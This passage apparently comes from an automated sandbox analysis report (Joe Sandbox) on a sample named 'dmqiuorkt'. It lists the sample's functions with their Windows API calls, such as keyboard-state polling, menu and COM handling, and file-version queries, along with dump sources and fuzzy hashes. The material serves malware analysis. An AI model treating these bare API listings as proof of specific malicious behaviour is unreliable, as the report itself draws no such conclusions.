                                                                                                                                                                            • Instruction ID: fd7a378077546019b44d719d4aa1079f2e114fa0452b43bf11ba5beddd906d29
                                                                                                                                                                            • Opcode Fuzzy Hash: 9cf91bb6b79e258b1397681de8a34f7e973a81cbdbd26ae199e473c89fb5fa2a
                                                                                                                                                                            • Instruction Fuzzy Hash: 9B212932A45354EFD7106BB8AC45B2977D8FB44B69F008129F919EA395DB64CC008E61
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,008EDCD0), ref: 008D4A18
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 008D4A2A
                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,008EDCD0), ref: 008D4A4F
                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,008EDCD0), ref: 008D4A9B
                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028,?,008EDCD0), ref: 008D4B05
                                                                                                                                                                            • SysFreeString.OLEAUT32(00000009), ref: 008D4BBF
                                                                                                                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 008D4C25
                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 008D4C4F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                            • API String ID: 354098117-199464113
                                                                                                                                                                            • Opcode ID: cc222e9b94294cf19f0ce23c0faf8a1cfb5118a590c2e3c75149a1cdfefd3895
                                                                                                                                                                            • Instruction ID: 55aab6a089713496ea16c84223ee530f8ba10ce2fd2d061a92721e219f738b41
                                                                                                                                                                            • Opcode Fuzzy Hash: cc222e9b94294cf19f0ce23c0faf8a1cfb5118a590c2e3c75149a1cdfefd3895
                                                                                                                                                                            • Instruction Fuzzy Hash: 2F124C71A00219EFCB14CF94C884EAEBBB5FF45318F248199E915DB261D731ED46CBA0
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetMenuItemInfoW.USER32(00922990,000000FF,00000000,00000030), ref: 008BC888
                                                                                                                                                                            • SetMenuItemInfoW.USER32(00922990,00000004,00000000,00000030), ref: 008BC8BD
                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 008BC8CF
                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 008BC915
                                                                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 008BC932
                                                                                                                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 008BC95E
                                                                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 008BC9A5
                                                                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008BC9EB
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008BCA00
                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008BCA21
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 1460738036-4108050209
                                                                                                                                                                            • Opcode ID: 5dbea8989b0fdeb3543410f4ffb30c3eb18d59fa1b2bedc2e8469dc3e0d7a944
                                                                                                                                                                            • Instruction ID: 61189574b3aba72e20c7a4fb13c6ddc045f71c2dfaaa75e61e7c7efccb678911
                                                                                                                                                                            • Opcode Fuzzy Hash: 5dbea8989b0fdeb3543410f4ffb30c3eb18d59fa1b2bedc2e8469dc3e0d7a944
                                                                                                                                                                            • Instruction Fuzzy Hash: B1616EB090025AAFEF25CF68D888AFEBFA8FB45348F140125E851E7351D735AD45CB61
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 008BE3E9
                                                                                                                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 008BE40F
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008BE419
                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 008BE469
                                                                                                                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 008BE485
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                            • API String ID: 1939486746-1459072770
                                                                                                                                                                            • Opcode ID: 0c18a70c5bb51d6ed64b6e478bf8c318b135d0ce354941ee4e2b24e1570743d2
                                                                                                                                                                            • Instruction ID: 69fdccbbf5eb948b11e83263854744805c9f79b2386e7c8bd025926f04d1c6bc
                                                                                                                                                                            • Opcode Fuzzy Hash: 0c18a70c5bb51d6ed64b6e478bf8c318b135d0ce354941ee4e2b24e1570743d2
                                                                                                                                                                            • Instruction Fuzzy Hash: A241E5726403157EEB10AB688C46EFF7B6CFF55710F108065F904E6282EB74DA0196B6
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008C469A
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008C46C7
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 008C46F7
                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 008C4718
                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 008C4728
                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 008C47AF
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008C47BA
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008C47C5
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                            • String ID: :$\$\??\%s
                                                                                                                                                                            • API String ID: 1149970189-3457252023
                                                                                                                                                                            • Opcode ID: 7092a506301f90f1e9a0e97baddf616daecd2fdeee53d737faf0ec67e4cdbc7b
                                                                                                                                                                            • Instruction ID: c483e6067b30fb44367fb98725d1c5fb8f128504b54d4d1d86024f315cdea9b9
                                                                                                                                                                            • Opcode Fuzzy Hash: 7092a506301f90f1e9a0e97baddf616daecd2fdeee53d737faf0ec67e4cdbc7b
                                                                                                                                                                            • Instruction Fuzzy Hash: AC31D271900249ABDB20DFA4DC88FEB77BCFF89740F1041A9F619DA164E770D6848B21
APIs
• GetKeyboardState.USER32(?), ref: 008BA8EE
• SetKeyboardState.USER32(?), ref: 008BA959
• GetAsyncKeyState.USER32(000000A0), ref: 008BA979
• GetKeyState.USER32(000000A0), ref: 008BA990
• GetAsyncKeyState.USER32(000000A1), ref: 008BA9BF
• GetKeyState.USER32(000000A1), ref: 008BA9D0
• GetAsyncKeyState.USER32(00000011), ref: 008BA9FC
• GetKeyState.USER32(00000011), ref: 008BAA0A
• GetAsyncKeyState.USER32(00000012), ref: 008BAA33
• GetKeyState.USER32(00000012), ref: 008BAA41
• GetAsyncKeyState.USER32(0000005B), ref: 008BAA6A
• GetKeyState.USER32(0000005B), ref: 008BAA78
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: f49fcbb860dc9e75396023f4b69b353ed21a2e04273c0c1c362bab7eb5497e94
• Instruction ID: 0b9b9491b1c83f4f8c4291d8d10ebdb34d161d0e979e8d6ac55f7023367120ce
• Opcode Fuzzy Hash: f49fcbb860dc9e75396023f4b69b353ed21a2e04273c0c1c362bab7eb5497e94
• Instruction Fuzzy Hash: 5A51D83090479869FB39E7B489507EABFB4FF11340F48459AC5C29B7C2DA949A4CC763
APIs
• GetDlgItem.USER32(?,00000001), ref: 008B6571
• GetWindowRect.USER32(00000000,?), ref: 008B658A
• MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 008B65E8
• GetDlgItem.USER32(?,00000002), ref: 008B65F8
• GetWindowRect.USER32(00000000,?), ref: 008B660A
• MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 008B665E
• GetDlgItem.USER32(?,000003E9), ref: 008B666C
• GetWindowRect.USER32(00000000,?), ref: 008B667E
• MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 008B66C0
• GetDlgItem.USER32(?,000003EA), ref: 008B66D3
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 008B66E9
• InvalidateRect.USER32(?,00000000,00000001), ref: 008B66F6
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: 5b4cce713e733eeccdf8558f17fbf48e700c5bbf1fca228cef3fe3b7154344e7
• Instruction ID: cb12fa16a71a90fbef2d168811d70e18f0f18f4e2e1a057ee28eb2c8a47b274b
• Opcode Fuzzy Hash: 5b4cce713e733eeccdf8558f17fbf48e700c5bbf1fca228cef3fe3b7154344e7
• Instruction Fuzzy Hash: F9511EB1A00309AFDF18CF68DD89AAEBBB5FB58300F148129F919E7290E7749D148B50
APIs
  • Part of subcall function 008521E4: GetWindowLongW.USER32(?,000000EB), ref: 008521F2
• GetSysColor.USER32(0000000F), ref: 00852102
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: f42a0f492c2a6698f4f40f8be1272f5f2f48daff31e8a2c8c1ffaba70e83cd5d
• Instruction ID: f0c5dc85d896d461181d1bd849c1fbc1777564ea0822c339d298a3c362b46f2c
• Opcode Fuzzy Hash: f42a0f492c2a6698f4f40f8be1272f5f2f48daff31e8a2c8c1ffaba70e83cd5d
• Instruction Fuzzy Hash: 2F41A331140B44AFDF215B289C84BBA7B65FB46322F544645FEA2CB2E1CB31AD469B10
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 008E499A
• CreateCompatibleDC.GDI32(00000000), ref: 008E49A1
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 008E49B4
• SelectObject.GDI32(00000000,00000000), ref: 008E49BC
• GetPixel.GDI32(00000000,00000000,00000000), ref: 008E49C7
• DeleteDC.GDI32(00000000), ref: 008E49D1
• GetWindowLongW.USER32(?,000000EC), ref: 008E49DB
• SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 008E49F1
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 008E49FD
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: 037b569e37612e79461b7df6d9f0a7e125d413b7b5d21e4c13d207bed948664d
• Instruction ID: 1671cc77539a445ad278184b89d3068f9bf08101366f85a41faf3d86771e83c4
• Opcode Fuzzy Hash: 037b569e37612e79461b7df6d9f0a7e125d413b7b5d21e4c13d207bed948664d
• Instruction Fuzzy Hash: 56317C32100259ABDF11AFA5DC48FDA3B69FF0A324F100211FA69EA1A1D735D815DBA4
APIs
• VariantInit.OLEAUT32(?), ref: 008D45B9
• CoInitialize.OLE32(00000000), ref: 008D45E7
• CoUninitialize.OLE32 ref: 008D45F1
• _wcslen.LIBCMT ref: 008D468A
• GetRunningObjectTable.OLE32(00000000,?), ref: 008D470E
• SetErrorMode.KERNEL32(00000001,00000029), ref: 008D4832
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 008D486B
• CoGetObject.OLE32(?,00000000,008F0B64,?), ref: 008D488A
• SetErrorMode.KERNEL32(00000000), ref: 008D489D
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 008D4921
• VariantClear.OLEAUT32(?), ref: 008D4935
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
• String ID:
• API String ID: 429561992-0
• Opcode ID: e05db51accba24ddeb97f6f9a4ab00c0cdb25d212bca244a546c57b60c164175
• Instruction ID: 5bbb9e291fc60d4e18c7b4c3e429089cde52d3b3d220067d43b06fe6e2e10e5f
• Opcode Fuzzy Hash: e05db51accba24ddeb97f6f9a4ab00c0cdb25d212bca244a546c57b60c164175
• Instruction Fuzzy Hash: 35C112716043459F9700DF68C88492BBBE9FF89748F145A2EF98ADB221DB31ED05CB52
APIs
• CoInitialize.OLE32(00000000), ref: 008C844D
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008C84E9
• SHGetDesktopFolder.SHELL32(?), ref: 008C84FD
• CoCreateInstance.OLE32(008F0CD4,00000000,00000001,00917E8C,?), ref: 008C8549
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008C85CE
• CoTaskMemFree.OLE32(?,?), ref: 008C8626
• SHBrowseForFolderW.SHELL32(?), ref: 008C86B1
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008C86D4
• CoTaskMemFree.OLE32(00000000), ref: 008C86DB
• CoTaskMemFree.OLE32(00000000), ref: 008C8730
• CoUninitialize.OLE32 ref: 008C8736
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
• String ID:
• API String ID: 2762341140-0
• Opcode ID: c6e660e704b7ebc8292bbe8a8b640318ad7b94d6b11bdc4c737c41b4aa3317cd
• Instruction ID: 42f32050c6b3975f23b6e629ace4bd66376fdce87f65a9e98d9cf3713cf50190
• Opcode Fuzzy Hash: c6e660e704b7ebc8292bbe8a8b640318ad7b94d6b11bdc4c737c41b4aa3317cd
• Instruction Fuzzy Hash: 6DC10B75A00219EFCB14DFA4C888DAEBBF5FF48305B1484A9E919EB261DB30ED45CB50
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 008B033F
• SafeArrayAllocData.OLEAUT32(?), ref: 008B0398
• VariantInit.OLEAUT32(?), ref: 008B03AA
• SafeArrayAccessData.OLEAUT32(?,?), ref: 008B03CA
• VariantCopy.OLEAUT32(?,?), ref: 008B041D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 008B0431
• VariantClear.OLEAUT32(?), ref: 008B0446
• SafeArrayDestroyData.OLEAUT32(?), ref: 008B0453
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008B045C
• VariantClear.OLEAUT32(?), ref: 008B046E
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008B0479
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: 388a685e08c431963a176f2eab09c55e95cd86396fc116ac7bbb0ba487823b4e
• Instruction ID: d3b13524bc476566fa7b5e078e24ad7a69af94c55a0a917b5a76c390eb2cee51
• Opcode Fuzzy Hash: 388a685e08c431963a176f2eab09c55e95cd86396fc116ac7bbb0ba487823b4e
• Instruction Fuzzy Hash: 5A414175A002199FCB04DF68D8849EEBBB9FF58348F008069E955EB361C730E949CF95
APIs
  • Part of subcall function 00852441: GetWindowLongW.USER32(00000000,000000EB), ref: 00852452
• GetSystemMetrics.USER32(0000000F), ref: 008EA926
• GetSystemMetrics.USER32(0000000F), ref: 008EA946
• MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 008EAB83
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 008EABA1
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 008EABC2
• ShowWindow.USER32(00000003,00000000), ref: 008EABE1
• InvalidateRect.USER32(?,00000000,00000001), ref: 008EAC06
• DefDlgProcW.USER32(?,00000005,?,?), ref: 008EAC29
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
• String ID:
• API String ID: 1211466189-3916222277
• Opcode ID: c265b35201b921b7b830a3f301755360129d9687352b1073bf672259d9ac856a
• Instruction ID: 92a0ab9389460683262be0f4046e8a5136f92c949f5a36cf5a345f59ceb6fcab
• Opcode Fuzzy Hash: c265b35201b921b7b830a3f301755360129d9687352b1073bf672259d9ac856a
• Instruction Fuzzy Hash: 2DB19935600259EFDF18CF2AC9857AE7BB2FF85B10F188069EC45DE295D730A980CB61
APIs
• GetLocalTime.KERNEL32(?), ref: 008C8BB1
• SystemTimeToFileTime.KERNEL32(?,?), ref: 008C8BC1
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008C8BCD
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008C8C6A
• SetCurrentDirectoryW.KERNEL32(?), ref: 008C8C7E
• SetCurrentDirectoryW.KERNEL32(?), ref: 008C8CB0
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 008C8CE6
• SetCurrentDirectoryW.KERNEL32(?), ref: 008C8CEF
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local$System
• String ID: *.*
• API String ID: 1464919966-438819550
• Opcode ID: 3cffce01cad43db7ff23b9852e4bf4c5d0e26beb128455bc87c3a522a5f08dee
• Instruction ID: 2c5caacacdf1cff4c06885dd38e1f1bbf37a4b7504abd895aec309f48adc2ac8
• Opcode Fuzzy Hash: 3cffce01cad43db7ff23b9852e4bf4c5d0e26beb128455bc87c3a522a5f08dee
• Instruction Fuzzy Hash: 936127B25043459FCB10EF64C845E9EB7E8FF89314F04881EE989D7251DB35EA49CB52
APIs
• CreateMenu.USER32 ref: 008E45D8
• SetMenu.USER32(?,00000000), ref: 008E45E7
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E466F
• IsMenu.USER32(?), ref: 008E4683
• CreatePopupMenu.USER32 ref: 008E468D
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008E46BA
• DrawMenuBar.USER32 ref: 008E46C2
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup
• String ID: 0$F
• API String ID: 161812096-3044882817
• Opcode ID: 3e64794e132a08b371068570d777f9931d165e81b14f8382ef9e2d8c9b1d2fbe
• Instruction ID: 86db26581aa69a906149c5f27957fd1f2f6510e25bd019f4db8cde60cf2f9209
                                                                                                                                                                            • Opcode Fuzzy Hash: 3e64794e132a08b371068570d777f9931d165e81b14f8382ef9e2d8c9b1d2fbe
                                                                                                                                                                            • Instruction Fuzzy Hash: 9D416778605349EFEB24DF65D894AAA7BB5FF5A314F140028FA49AB360C731A924CF50
                                                                                                                                                                            APIs
